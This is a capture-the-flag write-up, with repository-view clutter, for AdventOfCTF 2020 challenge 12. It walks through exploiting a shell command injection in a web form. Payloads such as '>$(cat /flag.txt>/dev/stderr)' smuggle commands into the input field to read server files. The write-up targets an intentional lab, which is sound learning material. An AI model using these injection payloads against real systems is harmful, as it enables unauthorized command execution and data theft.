You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
125 lines
4.4 KiB
125 lines
4.4 KiB
4 years ago
|
+++
|
||
|
|
author = "Maik de Kruif"
|
||
|
3 years ago
|
title = "Challenge 12"
|
||
|
|
subtitle = "Challenge 12 - AdventOfCTF"
|
||
|
4 years ago
|
date = 2020-12-14T15:55:21+01:00
|
||
|
|
description = "A writeup for challenge 12 of AdventOfCTF."
|
||
|
3 years ago
|
cover = "img/writeups/adventofctf/2020/af3424cd215a6459494ae07eab33cb35.png"
|
||
|
4 years ago
|
tags = [
|
||
|
|
"AdventOfCTF",
|
||
|
|
"challenge",
|
||
|
|
"ctf",
|
||
|
|
"hacking",
|
||
|
|
"writeup",
|
||
|
|
"web",
|
||
|
|
"php",
|
||
|
|
]
|
||
|
|
categories = [
|
||
|
|
"ctf",
|
||
|
|
"writeups",
|
||
|
|
"hacking",
|
||
|
|
]
|
||
|
|
+++
|
||
|
|
|
||
|
4 years ago
|
- Points: 1200
|
||
|
4 years ago
|
|
||
|
|
## Description
|
||
|
|
|
||
|
|
To ensure a good Christmas we implemented some diagnostic tools. This one checks that the time to a destination is within an acceptable range. The flag is in /flag.txt.
|
||
|
|
|
||
|
|
Visit <https://12.adventofctf.com> to start the challenge.
|
||
|
|
|
||
|
|
## Finding the vulnerability
|
||
|
|
|
||
|
|
Upon opening the challenge website we're greeted with an input field and a check button. Let's enter some text in the input and press the check button. Initially, nothing happens but after a few seconds we get a result: `1607956922.306628 Destination check was OK`. As the page didn't reload there is probably some javascript in play. Indeed there is, when opening the source, we find a script tag with the following javascript function:
|
||
|
|
|
||
|
|
```js
|
||
|
|
function send() {
|
||
|
|
let place = $("#place")[0].value;
|
||
|
|
if (place.length > 0) {
|
||
|
|
$.post("/", { place: place }, function (data) {
|
||
|
|
$("#result")[0].innerHTML = "<b>" + data + "</b>";
|
||
|
|
});
|
||
|
|
}
|
||
|
|
return false;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
If we analyze this function a bit we find that it executes a `POST` request to `/` and puts the result in an HTML element with this selector: `'#result'`.
|
||
|
|
|
||
|
|
Let's try some more inputs. Just plain text doesn't seem to change the result much besides the number before "Destination check". If we, however, enter a quote (`"`), we get a different result back:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: /bin/bash: -c: line 0: unexpected EOF while looking for matching `"'
|
||
|
|
/bin/bash: -c: line 1: syntax error: unexpected end of file
|
||
|
|
```
|
||
|
|
|
||
|
|
And inputting a backtick (`) returns this error:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: BusyBox v1.31.1 () multi-call binary.
|
||
|
|
|
||
|
|
Usage: nslookup [-type=QUERY_TYPE] [-debug] HOST [DNS_SERVER]
|
||
|
|
|
||
|
|
Query DNS about HOST
|
||
|
|
|
||
|
|
QUERY_TYPE: soa,ns,a,aaaa,cname,mx,txt,ptr,any
|
||
|
|
```
|
||
|
|
|
||
|
|
### nslookup
|
||
|
|
|
||
|
|
I spend quite some time trying to find a way to get out of this command but I could not get anything to work so I took a break.
|
||
|
|
|
||
|
|
### Redirection
|
||
|
|
|
||
|
|
When I came back, I tried inputting a redirect character (`>`) and it gave a result!
|
||
|
|
|
||
|
|
## Getting some output
|
||
|
|
|
||
|
|
After entering a redirection character (`>`) we get the following result:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: /bin/bash: -c: line 0: syntax error near unexpected token `newline'
|
||
|
|
/bin/bash: -c: line 0: `./check >'
|
||
|
|
```
|
||
|
|
|
||
|
|
This means we can redirect output and thus get arbitrary code execution by putting a sub-command as the output like so:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
> $(ls)
|
||
|
|
```
|
||
|
|
|
||
|
|
But entering this gave an error:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: /bin/bash: $(ls): ambiguous redirect
|
||
|
|
```
|
||
|
|
|
||
|
|
This means that, while it does work, it does not work directly as the output isn't valid. If we, however, put a sub-command inside a sub-command (`> $($(ls))`), the inner output will be printed:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: /bin/bash: app.py: command not found
|
||
|
|
/bin/bash: $($(ls)): ambiguous redirect
|
||
|
|
```
|
||
|
|
|
||
|
|
As we can see, there seems to be an `app.py` file but we don't care about it now. Let's try to cat the flag from the location specified in the challenge description (`/flag.txt`) by entering the following input: `>$($(cat /flag.txt))`. This return the following result:
|
||
|
|
|
||
|
|
```text
|
||
|
|
Something happened: /bin/bash: Congratulations,: command not found
|
||
|
|
/bin/bash: $($(cat /flag.txt)): ambiguous redirect
|
||
|
|
```
|
||
|
|
|
||
|
|
As we can see, it did read the file. Sadly, however, it only returned the first line...
|
||
|
|
|
||
|
|
At this point, I didn't really know what to do but just as I was about to take another break, [@credmp](https://twitter.com/credmp) posted a hint on Twitter. It said the following: "Hint: all error messages are printed on stderr.".
|
||
|
|
|
||
|
|
### Redirecting the output
|
||
|
|
|
||
|
|
After reading this tweet, I tried the following input: `>$(cat /flag.txt>/dev/stderr)` and it immediately worked! I felt pretty stupid for not having thought about that 😐.
|
||
|
|
|
||
|
|
## Solution
|
||
|
|
|
||
|
|
So redirecting the output to `stderr` worked and we got the flag: `NOVI{we_are_halfway_to_christmas!}`.
|
||
|
|
|
||
|
|
This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#12-13).
|